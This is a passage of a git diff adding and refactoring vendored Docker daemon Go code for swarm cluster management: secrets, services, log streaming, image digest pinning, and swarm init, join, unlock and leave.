func (c *Cluster) GetSecrets(options apitypes.SecretListOptions) ([]types.Secret, error) { - c.RLock() - defer c.RUnlock() + c.mu.RLock() + defer c.mu.RUnlock() - if !c.isActiveManager() { - return nil, c.errNoManager() + state := c.currentNodeState() + if !state.IsActiveManager() { + return nil, c.errNoManager(state) } filters, err := newListSecretsFilters(options.Filters) @@ -43,13 +43,13 @@ func (c *Cluster) GetSecrets(options apitypes.SecretListOptions) ([]types.Secret ctx, cancel := c.getRequestContext() defer cancel() - r, err := c.node.client.ListSecrets(ctx, + r, err := state.controlClient.ListSecrets(ctx, &swarmapi.ListSecretsRequest{Filters: filters}) if err != nil { return nil, err } - secrets := []types.Secret{} + secrets := make([]types.Secret, 0, len(r.Secrets)) for _, secret := range r.Secrets { secrets = append(secrets, convert.SecretFromGRPC(secret)) @@ -60,74 +60,59 @@ func (c *Cluster) GetSecrets(options apitypes.SecretListOptions) ([]types.Secret // CreateSecret creates a new secret in a managed swarm cluster. func (c *Cluster) CreateSecret(s types.SecretSpec) (string, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return "", c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - secretSpec := convert.SecretSpecToGRPC(s) - - r, err := c.node.client.CreateSecret(ctx, - &swarmapi.CreateSecretRequest{Spec: &secretSpec}) - if err != nil { + var resp *swarmapi.CreateSecretResponse + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + secretSpec := convert.SecretSpecToGRPC(s) + + r, err := state.controlClient.CreateSecret(ctx, + &swarmapi.CreateSecretRequest{Spec: &secretSpec}) + if err != nil { + return err + } + resp = r + return nil + }); err != nil { return "", err } - - return r.Secret.ID, nil + return resp.Secret.ID, nil } // RemoveSecret removes a secret from a managed swarm cluster. 
-func (c *Cluster) RemoveSecret(id string) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - req := &swarmapi.RemoveSecretRequest{ - SecretID: id, - } - - if _, err := c.node.client.RemoveSecret(ctx, req); err != nil { +func (c *Cluster) RemoveSecret(input string) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + secret, err := getSecret(ctx, state.controlClient, input) + if err != nil { + return err + } + + req := &swarmapi.RemoveSecretRequest{ + SecretID: secret.ID, + } + + _, err = state.controlClient.RemoveSecret(ctx, req) return err - } - return nil + }) } // UpdateSecret updates a secret in a managed swarm cluster. // Note: this is not exposed to the CLI but is available from the API only -func (c *Cluster) UpdateSecret(id string, version uint64, spec types.SecretSpec) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - secretSpec := convert.SecretSpecToGRPC(spec) - - if _, err := c.client.UpdateSecret(ctx, - &swarmapi.UpdateSecretRequest{ - SecretID: id, - SecretVersion: &swarmapi.Version{ - Index: version, - }, - Spec: &secretSpec, - }); err != nil { +func (c *Cluster) UpdateSecret(input string, version uint64, spec types.SecretSpec) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + secret, err := getSecret(ctx, state.controlClient, input) + if err != nil { + return err + } + + secretSpec := convert.SecretSpecToGRPC(spec) + + _, err = state.controlClient.UpdateSecret(ctx, + &swarmapi.UpdateSecretRequest{ + SecretID: secret.ID, + SecretVersion: &swarmapi.Version{ + Index: version, + }, + Spec: &secretSpec, + }) return err - } - - return nil + }) } diff --git a/vendor/github.com/docker/docker/daemon/cluster/services.go 
b/vendor/github.com/docker/docker/daemon/cluster/services.go new file mode 100644 index 0000000000..c14037645c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/services.go @@ -0,0 +1,602 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + "encoding/base64" + "encoding/json" + "fmt" + "io" + "os" + "strconv" + "strings" + "time" + + "github.com/docker/distribution/reference" + apitypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + types "github.com/docker/docker/api/types/swarm" + timetypes "github.com/docker/docker/api/types/time" + "github.com/docker/docker/daemon/cluster/convert" + "github.com/docker/docker/errdefs" + runconfigopts "github.com/docker/docker/runconfig/opts" + swarmapi "github.com/docker/swarmkit/api" + gogotypes "github.com/gogo/protobuf/types" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// GetServices returns all services of a managed swarm cluster. +func (c *Cluster) GetServices(options apitypes.ServiceListOptions) ([]types.Service, error) { + c.mu.RLock() + defer c.mu.RUnlock() + + state := c.currentNodeState() + if !state.IsActiveManager() { + return nil, c.errNoManager(state) + } + + // We move the accepted filter check here as "mode" filter + // is processed in the daemon, not in SwarmKit. So it might + // be good to have accepted file check in the same file as + // the filter processing (in the for loop below). 
+ accepted := map[string]bool{ + "name": true, + "id": true, + "label": true, + "mode": true, + "runtime": true, + } + if err := options.Filters.Validate(accepted); err != nil { + return nil, err + } + + if len(options.Filters.Get("runtime")) == 0 { + // Default to using the container runtime filter + options.Filters.Add("runtime", string(types.RuntimeContainer)) + } + + filters := &swarmapi.ListServicesRequest_Filters{ + NamePrefixes: options.Filters.Get("name"), + IDPrefixes: options.Filters.Get("id"), + Labels: runconfigopts.ConvertKVStringsToMap(options.Filters.Get("label")), + Runtimes: options.Filters.Get("runtime"), + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := state.controlClient.ListServices( + ctx, + &swarmapi.ListServicesRequest{Filters: filters}) + if err != nil { + return nil, err + } + + services := make([]types.Service, 0, len(r.Services)) + + for _, service := range r.Services { + if options.Filters.Contains("mode") { + var mode string + switch service.Spec.GetMode().(type) { + case *swarmapi.ServiceSpec_Global: + mode = "global" + case *swarmapi.ServiceSpec_Replicated: + mode = "replicated" + } + + if !options.Filters.ExactMatch("mode", mode) { + continue + } + } + svcs, err := convert.ServiceFromGRPC(*service) + if err != nil { + return nil, err + } + services = append(services, svcs) + } + + return services, nil +} + +// GetService returns a service based on an ID or name. 
+func (c *Cluster) GetService(input string, insertDefaults bool) (types.Service, error) { + var service *swarmapi.Service + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + s, err := getService(ctx, state.controlClient, input, insertDefaults) + if err != nil { + return err + } + service = s + return nil + }); err != nil { + return types.Service{}, err + } + svc, err := convert.ServiceFromGRPC(*service) + if err != nil { + return types.Service{}, err + } + return svc, nil +} + +// CreateService creates a new service in a managed swarm cluster. +func (c *Cluster) CreateService(s types.ServiceSpec, encodedAuth string, queryRegistry bool) (*apitypes.ServiceCreateResponse, error) { + var resp *apitypes.ServiceCreateResponse + err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + err := c.populateNetworkID(ctx, state.controlClient, &s) + if err != nil { + return err + } + + serviceSpec, err := convert.ServiceSpecToGRPC(s) + if err != nil { + return errdefs.InvalidParameter(err) + } + + resp = &apitypes.ServiceCreateResponse{} + + switch serviceSpec.Task.Runtime.(type) { + case *swarmapi.TaskSpec_Attachment: + return fmt.Errorf("invalid task spec: spec type %q not supported", types.RuntimeNetworkAttachment) + // handle other runtimes here + case *swarmapi.TaskSpec_Generic: + switch serviceSpec.Task.GetGeneric().Kind { + case string(types.RuntimePlugin): + info, _ := c.config.Backend.SystemInfo() + if !info.ExperimentalBuild { + return fmt.Errorf("runtime type %q only supported in experimental", types.RuntimePlugin) + } + if s.TaskTemplate.PluginSpec == nil { + return errors.New("plugin spec must be set") + } + + default: + return fmt.Errorf("unsupported runtime type: %q", serviceSpec.Task.GetGeneric().Kind) + } + + r, err := state.controlClient.CreateService(ctx, &swarmapi.CreateServiceRequest{Spec: &serviceSpec}) + if err != nil { + return err + } + + resp.ID = r.Service.ID + case 
*swarmapi.TaskSpec_Container: + ctnr := serviceSpec.Task.GetContainer() + if ctnr == nil { + return errors.New("service does not use container tasks") + } + if encodedAuth != "" { + ctnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth} + } + + // retrieve auth config from encoded auth + authConfig := &apitypes.AuthConfig{} + if encodedAuth != "" { + authReader := strings.NewReader(encodedAuth) + dec := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, authReader)) + if err := dec.Decode(authConfig); err != nil { + logrus.Warnf("invalid authconfig: %v", err) + } + } + + // pin image by digest for API versions < 1.30 + // TODO(nishanttotla): The check on "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE" + // should be removed in the future. Since integration tests only use the + // latest API version, so this is no longer required. + if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" && queryRegistry { + digestImage, err := c.imageWithDigestString(ctx, ctnr.Image, authConfig) + if err != nil { + logrus.Warnf("unable to pin image %s to digest: %s", ctnr.Image, err.Error()) + // warning in the client response should be concise + resp.Warnings = append(resp.Warnings, digestWarning(ctnr.Image)) + + } else if ctnr.Image != digestImage { + logrus.Debugf("pinning image %s by digest: %s", ctnr.Image, digestImage) + ctnr.Image = digestImage + + } else { + logrus.Debugf("creating service using supplied digest reference %s", ctnr.Image) + + } + + // Replace the context with a fresh one. + // If we timed out while communicating with the + // registry, then "ctx" will already be expired, which + // would cause UpdateService below to fail. Reusing + // "ctx" could make it impossible to create a service + // if the registry is slow or unresponsive. 
+ var cancel func() + ctx, cancel = c.getRequestContext() + defer cancel() + } + + r, err := state.controlClient.CreateService(ctx, &swarmapi.CreateServiceRequest{Spec: &serviceSpec}) + if err != nil { + return err + } + + resp.ID = r.Service.ID + } + return nil + }) + + return resp, err +} + +// UpdateService updates existing service to match new properties. +func (c *Cluster) UpdateService(serviceIDOrName string, version uint64, spec types.ServiceSpec, flags apitypes.ServiceUpdateOptions, queryRegistry bool) (*apitypes.ServiceUpdateResponse, error) { + var resp *apitypes.ServiceUpdateResponse + + err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + + err := c.populateNetworkID(ctx, state.controlClient, &spec) + if err != nil { + return err + } + + serviceSpec, err := convert.ServiceSpecToGRPC(spec) + if err != nil { + return errdefs.InvalidParameter(err) + } + + currentService, err := getService(ctx, state.controlClient, serviceIDOrName, false) + if err != nil { + return err + } + + resp = &apitypes.ServiceUpdateResponse{} + + switch serviceSpec.Task.Runtime.(type) { + case *swarmapi.TaskSpec_Attachment: + return fmt.Errorf("invalid task spec: spec type %q not supported", types.RuntimeNetworkAttachment) + case *swarmapi.TaskSpec_Generic: + switch serviceSpec.Task.GetGeneric().Kind { + case string(types.RuntimePlugin): + if spec.TaskTemplate.PluginSpec == nil { + return errors.New("plugin spec must be set") + } + } + case *swarmapi.TaskSpec_Container: + newCtnr := serviceSpec.Task.GetContainer() + if newCtnr == nil { + return errors.New("service does not use container tasks") + } + + encodedAuth := flags.EncodedRegistryAuth + if encodedAuth != "" { + newCtnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth} + } else { + // this is needed because if the encodedAuth isn't being updated then we + // shouldn't lose it, and continue to use the one that was already present + var ctnr *swarmapi.ContainerSpec + 
switch flags.RegistryAuthFrom { + case apitypes.RegistryAuthFromSpec, "": + ctnr = currentService.Spec.Task.GetContainer() + case apitypes.RegistryAuthFromPreviousSpec: + if currentService.PreviousSpec == nil { + return errors.New("service does not have a previous spec") + } + ctnr = currentService.PreviousSpec.Task.GetContainer() + default: + return errors.New("unsupported registryAuthFrom value") + } + if ctnr == nil { + return errors.New("service does not use container tasks") + } + newCtnr.PullOptions = ctnr.PullOptions + // update encodedAuth so it can be used to pin image by digest + if ctnr.PullOptions != nil { + encodedAuth = ctnr.PullOptions.RegistryAuth + } + } + + // retrieve auth config from encoded auth + authConfig := &apitypes.AuthConfig{} + if encodedAuth != "" { + if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil { + logrus.Warnf("invalid authconfig: %v", err) + } + } + + // pin image by digest for API versions < 1.30 + // TODO(nishanttotla): The check on "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE" + // should be removed in the future. Since integration tests only use the + // latest API version, so this is no longer required. + if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" && queryRegistry { + digestImage, err := c.imageWithDigestString(ctx, newCtnr.Image, authConfig) + if err != nil { + logrus.Warnf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error()) + // warning in the client response should be concise + resp.Warnings = append(resp.Warnings, digestWarning(newCtnr.Image)) + } else if newCtnr.Image != digestImage { + logrus.Debugf("pinning image %s by digest: %s", newCtnr.Image, digestImage) + newCtnr.Image = digestImage + } else { + logrus.Debugf("updating service using supplied digest reference %s", newCtnr.Image) + } + + // Replace the context with a fresh one. 
+ // If we timed out while communicating with the + // registry, then "ctx" will already be expired, which + // would cause UpdateService below to fail. Reusing + // "ctx" could make it impossible to update a service + // if the registry is slow or unresponsive. + var cancel func() + ctx, cancel = c.getRequestContext() + defer cancel() + } + } + + var rollback swarmapi.UpdateServiceRequest_Rollback + switch flags.Rollback { + case "", "none": + rollback = swarmapi.UpdateServiceRequest_NONE + case "previous": + rollback = swarmapi.UpdateServiceRequest_PREVIOUS + default: + return fmt.Errorf("unrecognized rollback option %s", flags.Rollback) + } + + _, err = state.controlClient.UpdateService( + ctx, + &swarmapi.UpdateServiceRequest{ + ServiceID: currentService.ID, + Spec: &serviceSpec, + ServiceVersion: &swarmapi.Version{ + Index: version, + }, + Rollback: rollback, + }, + ) + return err + }) + return resp, err +} + +// RemoveService removes a service from a managed swarm cluster. +func (c *Cluster) RemoveService(input string) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + service, err := getService(ctx, state.controlClient, input, false) + if err != nil { + return err + } + + _, err = state.controlClient.RemoveService(ctx, &swarmapi.RemoveServiceRequest{ServiceID: service.ID}) + return err + }) +} + +// ServiceLogs collects service logs and writes them back to `config.OutStream` +func (c *Cluster) ServiceLogs(ctx context.Context, selector *backend.LogSelector, config *apitypes.ContainerLogsOptions) (<-chan *backend.LogMessage, error) { + c.mu.RLock() + defer c.mu.RUnlock() + + state := c.currentNodeState() + if !state.IsActiveManager() { + return nil, c.errNoManager(state) + } + + swarmSelector, err := convertSelector(ctx, state.controlClient, selector) + if err != nil { + return nil, errors.Wrap(err, "error making log selector") + } + + // set the streams we'll use + stdStreams := []swarmapi.LogStream{} + if 
config.ShowStdout { + stdStreams = append(stdStreams, swarmapi.LogStreamStdout) + } + if config.ShowStderr { + stdStreams = append(stdStreams, swarmapi.LogStreamStderr) + } + + // Get tail value squared away - the number of previous log lines we look at + var tail int64 + // in ContainerLogs, if the tail value is ANYTHING non-integer, we just set + // it to -1 (all). i don't agree with that, but i also think no tail value + // should be legitimate. if you don't pass tail, we assume you want "all" + if config.Tail == "all" || config.Tail == "" { + // tail of 0 means send all logs on the swarmkit side + tail = 0 + } else { + t, err := strconv.Atoi(config.Tail) + if err != nil { + return nil, errors.New("tail value must be a positive integer or \"all\"") + } + if t < 0 { + return nil, errors.New("negative tail values not supported") + } + // we actually use negative tail in swarmkit to represent messages + // backwards starting from the beginning. also, -1 means no logs. so, + // basically, for api compat with docker container logs, add one and + // flip the sign. 
we error above if you try to negative tail, which + // isn't supported by docker (and would error deeper in the stack + // anyway) + // + // See the logs protobuf for more information + tail = int64(-(t + 1)) + } + + // get the since value - the time in the past we're looking at logs starting from + var sinceProto *gogotypes.Timestamp + if config.Since != "" { + s, n, err := timetypes.ParseTimestamps(config.Since, 0) + if err != nil { + return nil, errors.Wrap(err, "could not parse since timestamp") + } + since := time.Unix(s, n) + sinceProto, err = gogotypes.TimestampProto(since) + if err != nil { + return nil, errors.Wrap(err, "could not parse timestamp to proto") + } + } + + stream, err := state.logsClient.SubscribeLogs(ctx, &swarmapi.SubscribeLogsRequest{ + Selector: swarmSelector, + Options: &swarmapi.LogSubscriptionOptions{ + Follow: config.Follow, + Streams: stdStreams, + Tail: tail, + Since: sinceProto, + }, + }) + if err != nil { + return nil, err + } + + messageChan := make(chan *backend.LogMessage, 1) + go func() { + defer close(messageChan) + for { + // Check the context before doing anything. 
+ select { + case <-ctx.Done(): + return + default: + } + subscribeMsg, err := stream.Recv() + if err == io.EOF { + return + } + // if we're not io.EOF, push the message in and return + if err != nil { + select { + case <-ctx.Done(): + case messageChan <- &backend.LogMessage{Err: err}: + } + return + } + + for _, msg := range subscribeMsg.Messages { + // make a new message + m := new(backend.LogMessage) + m.Attrs = make([]backend.LogAttr, 0, len(msg.Attrs)+3) + // add the timestamp, adding the error if it fails + m.Timestamp, err = gogotypes.TimestampFromProto(msg.Timestamp) + if err != nil { + m.Err = err + } + + nodeKey := contextPrefix + ".node.id" + serviceKey := contextPrefix + ".service.id" + taskKey := contextPrefix + ".task.id" + + // copy over all of the details + for _, d := range msg.Attrs { + switch d.Key { + case nodeKey, serviceKey, taskKey: + // we have the final say over context details (in case there + // is a conflict (if the user added a detail with a context's + // key for some reason)) + default: + m.Attrs = append(m.Attrs, backend.LogAttr{Key: d.Key, Value: d.Value}) + } + } + m.Attrs = append(m.Attrs, + backend.LogAttr{Key: nodeKey, Value: msg.Context.NodeID}, + backend.LogAttr{Key: serviceKey, Value: msg.Context.ServiceID}, + backend.LogAttr{Key: taskKey, Value: msg.Context.TaskID}, + ) + + switch msg.Stream { + case swarmapi.LogStreamStdout: + m.Source = "stdout" + case swarmapi.LogStreamStderr: + m.Source = "stderr" + } + m.Line = msg.Data + + // there could be a case where the reader stops accepting + // messages and the context is canceled. we need to check that + // here, or otherwise we risk blocking forever on the message + // send. + select { + case <-ctx.Done(): + return + case messageChan <- m: + } + } + } + }() + return messageChan, nil +} + +// convertSelector takes a backend.LogSelector, which contains raw names that +// may or may not be valid, and converts them to an api.LogSelector proto. 
It +// returns an error if something fails +func convertSelector(ctx context.Context, cc swarmapi.ControlClient, selector *backend.LogSelector) (*swarmapi.LogSelector, error) { + // don't rely on swarmkit to resolve IDs, do it ourselves + swarmSelector := &swarmapi.LogSelector{} + for _, s := range selector.Services { + service, err := getService(ctx, cc, s, false) + if err != nil { + return nil, err + } + c := service.Spec.Task.GetContainer() + if c == nil { + return nil, errors.New("logs only supported on container tasks") + } + swarmSelector.ServiceIDs = append(swarmSelector.ServiceIDs, service.ID) + } + for _, t := range selector.Tasks { + task, err := getTask(ctx, cc, t) + if err != nil { + return nil, err + } + c := task.Spec.GetContainer() + if c == nil { + return nil, errors.New("logs only supported on container tasks") + } + swarmSelector.TaskIDs = append(swarmSelector.TaskIDs, task.ID) + } + return swarmSelector, nil +} + +// imageWithDigestString takes an image such as name or name:tag +// and returns the image pinned to a digest, such as name@sha256:34234 +func (c *Cluster) imageWithDigestString(ctx context.Context, image string, authConfig *apitypes.AuthConfig) (string, error) { + ref, err := reference.ParseAnyReference(image) + if err != nil { + return "", err + } + namedRef, ok := ref.(reference.Named) + if !ok { + if _, ok := ref.(reference.Digested); ok { + return image, nil + } + return "", errors.Errorf("unknown image reference format: %s", image) + } + // only query registry if not a canonical reference (i.e. 
with digest) + if _, ok := namedRef.(reference.Canonical); !ok { + namedRef = reference.TagNameOnly(namedRef) + + taggedRef, ok := namedRef.(reference.NamedTagged) + if !ok { + return "", errors.Errorf("image reference not tagged: %s", image) + } + + repo, _, err := c.config.ImageBackend.GetRepository(ctx, taggedRef, authConfig) + if err != nil { + return "", err + } + dscrptr, err := repo.Tags(ctx).Get(ctx, taggedRef.Tag()) + if err != nil { + return "", err + } + + namedDigestedRef, err := reference.WithDigest(taggedRef, dscrptr.Digest) + if err != nil { + return "", err + } + // return familiar form until interface updated to return type + return reference.FamiliarString(namedDigestedRef), nil + } + // reference already contains a digest, so just return it + return reference.FamiliarString(ref), nil +} + +// digestWarning constructs a formatted warning string +// using the image name that could not be pinned by digest. The +// formatting is hardcoded, but could me made smarter in the future +func digestWarning(image string) string { + return fmt.Sprintf("image %s could not be accessed on a registry to record\nits digest. 
Each node will access %s independently,\npossibly leading to different nodes running different\nversions of the image.\n", image, image) +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/swarm.go b/vendor/github.com/docker/docker/daemon/cluster/swarm.go new file mode 100644 index 0000000000..2f498ce263 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/swarm.go @@ -0,0 +1,569 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + "fmt" + "net" + "strings" + "time" + + apitypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/signal" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/manager/encryption" + swarmnode "github.com/docker/swarmkit/node" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// Init initializes new cluster from user provided request. +func (c *Cluster) Init(req types.InitRequest) (string, error) { + c.controlMutex.Lock() + defer c.controlMutex.Unlock() + if c.nr != nil { + if req.ForceNewCluster { + + // Take c.mu temporarily to wait for presently running + // API handlers to finish before shutting down the node. 
+ c.mu.Lock() + if !c.nr.nodeState.IsManager() { + return "", errSwarmNotManager + } + c.mu.Unlock() + + if err := c.nr.Stop(); err != nil { + return "", err + } + } else { + return "", errSwarmExists + } + } + + if err := validateAndSanitizeInitRequest(&req); err != nil { + return "", errdefs.InvalidParameter(err) + } + + listenHost, listenPort, err := resolveListenAddr(req.ListenAddr) + if err != nil { + return "", err + } + + advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort) + if err != nil { + return "", err + } + + dataPathAddr, err := resolveDataPathAddr(req.DataPathAddr) + if err != nil { + return "", err + } + + localAddr := listenHost + + // If the local address is undetermined, the advertise address + // will be used as local address, if it belongs to this system. + // If the advertise address is not local, then we try to find + // a system address to use as local address. If this fails, + // we give up and ask the user to pass the listen address. 
+ if net.ParseIP(localAddr).IsUnspecified() { + advertiseIP := net.ParseIP(advertiseHost) + + found := false + for _, systemIP := range listSystemIPs() { + if systemIP.Equal(advertiseIP) { + localAddr = advertiseIP.String() + found = true + break + } + } + + if !found { + ip, err := c.resolveSystemAddr() + if err != nil { + logrus.Warnf("Could not find a local address: %v", err) + return "", errMustSpecifyListenAddr + } + localAddr = ip.String() + } + } + + nr, err := c.newNodeRunner(nodeStartConfig{ + forceNewCluster: req.ForceNewCluster, + autolock: req.AutoLockManagers, + LocalAddr: localAddr, + ListenAddr: net.JoinHostPort(listenHost, listenPort), + AdvertiseAddr: net.JoinHostPort(advertiseHost, advertisePort), + DataPathAddr: dataPathAddr, + availability: req.Availability, + }) + if err != nil { + return "", err + } + c.mu.Lock() + c.nr = nr + c.mu.Unlock() + + if err := <-nr.Ready(); err != nil { + c.mu.Lock() + c.nr = nil + c.mu.Unlock() + if !req.ForceNewCluster { // if failure on first attempt don't keep state + if err := clearPersistentState(c.root); err != nil { + return "", err + } + } + return "", err + } + state := nr.State() + if state.swarmNode == nil { // should never happen but protect from panic + return "", errors.New("invalid cluster state for spec initialization") + } + if err := initClusterSpec(state.swarmNode, req.Spec); err != nil { + return "", err + } + return state.NodeID(), nil +} + +// Join makes current Cluster part of an existing swarm cluster. 
+func (c *Cluster) Join(req types.JoinRequest) error { + c.controlMutex.Lock() + defer c.controlMutex.Unlock() + c.mu.Lock() + if c.nr != nil { + c.mu.Unlock() + return errors.WithStack(errSwarmExists) + } + c.mu.Unlock() + + if err := validateAndSanitizeJoinRequest(&req); err != nil { + return errdefs.InvalidParameter(err) + } + + listenHost, listenPort, err := resolveListenAddr(req.ListenAddr) + if err != nil { + return err + } + + var advertiseAddr string + if req.AdvertiseAddr != "" { + advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort) + // For joining, we don't need to provide an advertise address, + // since the remote side can detect it. + if err == nil { + advertiseAddr = net.JoinHostPort(advertiseHost, advertisePort) + } + } + + dataPathAddr, err := resolveDataPathAddr(req.DataPathAddr) + if err != nil { + return err + } + + nr, err := c.newNodeRunner(nodeStartConfig{ + RemoteAddr: req.RemoteAddrs[0], + ListenAddr: net.JoinHostPort(listenHost, listenPort), + AdvertiseAddr: advertiseAddr, + DataPathAddr: dataPathAddr, + joinAddr: req.RemoteAddrs[0], + joinToken: req.JoinToken, + availability: req.Availability, + }) + if err != nil { + return err + } + + c.mu.Lock() + c.nr = nr + c.mu.Unlock() + + select { + case <-time.After(swarmConnectTimeout): + return errSwarmJoinTimeoutReached + case err := <-nr.Ready(): + if err != nil { + c.mu.Lock() + c.nr = nil + c.mu.Unlock() + if err := clearPersistentState(c.root); err != nil { + return err + } + } + return err + } +} + +// Inspect retrieves the configuration properties of a managed swarm cluster. 
+func (c *Cluster) Inspect() (types.Swarm, error) { + var swarm types.Swarm + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + s, err := c.inspect(ctx, state) + if err != nil { + return err + } + swarm = s + return nil + }); err != nil { + return types.Swarm{}, err + } + return swarm, nil +} + +func (c *Cluster) inspect(ctx context.Context, state nodeState) (types.Swarm, error) { + s, err := getSwarm(ctx, state.controlClient) + if err != nil { + return types.Swarm{}, err + } + return convert.SwarmFromGRPC(*s), nil +} + +// Update updates configuration of a managed swarm cluster. +func (c *Cluster) Update(version uint64, spec types.Spec, flags types.UpdateFlags) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + swarm, err := getSwarm(ctx, state.controlClient) + if err != nil { + return err + } + + // Validate spec name. + if spec.Annotations.Name == "" { + spec.Annotations.Name = "default" + } else if spec.Annotations.Name != "default" { + return errdefs.InvalidParameter(errors.New(`swarm spec must be named "default"`)) + } + + // In update, client should provide the complete spec of the swarm, including + // Name and Labels. If a field is specified with 0 or nil, then the default value + // will be used to swarmkit. + clusterSpec, err := convert.SwarmSpecToGRPC(spec) + if err != nil { + return errdefs.InvalidParameter(err) + } + + _, err = state.controlClient.UpdateCluster( + ctx, + &swarmapi.UpdateClusterRequest{ + ClusterID: swarm.ID, + Spec: &clusterSpec, + ClusterVersion: &swarmapi.Version{ + Index: version, + }, + Rotation: swarmapi.KeyRotation{ + WorkerJoinToken: flags.RotateWorkerToken, + ManagerJoinToken: flags.RotateManagerToken, + ManagerUnlockKey: flags.RotateManagerUnlockKey, + }, + }, + ) + return err + }) +} + +// GetUnlockKey returns the unlock key for the swarm. 
+func (c *Cluster) GetUnlockKey() (string, error) { + var resp *swarmapi.GetUnlockKeyResponse + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + client := swarmapi.NewCAClient(state.grpcConn) + + r, err := client.GetUnlockKey(ctx, &swarmapi.GetUnlockKeyRequest{}) + if err != nil { + return err + } + resp = r + return nil + }); err != nil { + return "", err + } + if len(resp.UnlockKey) == 0 { + // no key + return "", nil + } + return encryption.HumanReadableKey(resp.UnlockKey), nil +} + +// UnlockSwarm provides a key to decrypt data that is encrypted at rest. +func (c *Cluster) UnlockSwarm(req types.UnlockRequest) error { + c.controlMutex.Lock() + defer c.controlMutex.Unlock() + + c.mu.RLock() + state := c.currentNodeState() + + if !state.IsActiveManager() { + // when manager is not active, + // unless it is locked, otherwise return error. + if err := c.errNoManager(state); err != errSwarmLocked { + c.mu.RUnlock() + return err + } + } else { + // when manager is active, return an error of "not locked" + c.mu.RUnlock() + return notLockedError{} + } + + // only when swarm is locked, code running reaches here + nr := c.nr + c.mu.RUnlock() + + key, err := encryption.ParseHumanReadableKey(req.UnlockKey) + if err != nil { + return errdefs.InvalidParameter(err) + } + + config := nr.config + config.lockKey = key + if err := nr.Stop(); err != nil { + return err + } + nr, err = c.newNodeRunner(config) + if err != nil { + return err + } + + c.mu.Lock() + c.nr = nr + c.mu.Unlock() + + if err := <-nr.Ready(); err != nil { + if errors.Cause(err) == errSwarmLocked { + return invalidUnlockKey{} + } + return errors.Errorf("swarm component could not be started: %v", err) + } + return nil +} + +// Leave shuts down Cluster and removes current state. 
+func (c *Cluster) Leave(force bool) error { + c.controlMutex.Lock() + defer c.controlMutex.Unlock() + + c.mu.Lock() + nr := c.nr + if nr == nil { + c.mu.Unlock() + return errors.WithStack(errNoSwarm) + } + + state := c.currentNodeState() + + c.mu.Unlock() + + if errors.Cause(state.err) == errSwarmLocked && !force { + // leave a locked swarm without --force is not allowed + return errors.WithStack(notAvailableError("Swarm is encrypted and locked. Please unlock it first or use `--force` to ignore this message.")) + } + + if state.IsManager() && !force { + msg := "You are attempting to leave the swarm on a node that is participating as a manager. " + if state.IsActiveManager() { + active, reachable, unreachable, err := managerStats(state.controlClient, state.NodeID()) + if err == nil { + if active && removingManagerCausesLossOfQuorum(reachable, unreachable) { + if isLastManager(reachable, unreachable) { + msg += "Removing the last manager erases all current state of the swarm. Use `--force` to ignore this message. " + return errors.WithStack(notAvailableError(msg)) + } + msg += fmt.Sprintf("Removing this node leaves %v managers out of %v. Without a Raft quorum your swarm will be inaccessible. ", reachable-1, reachable+unreachable) + } + } + } else { + msg += "Doing so may lose the consensus of your cluster. " + } + + msg += "The only way to restore a swarm that has lost consensus is to reinitialize it with `--force-new-cluster`. Use `--force` to suppress this message." 
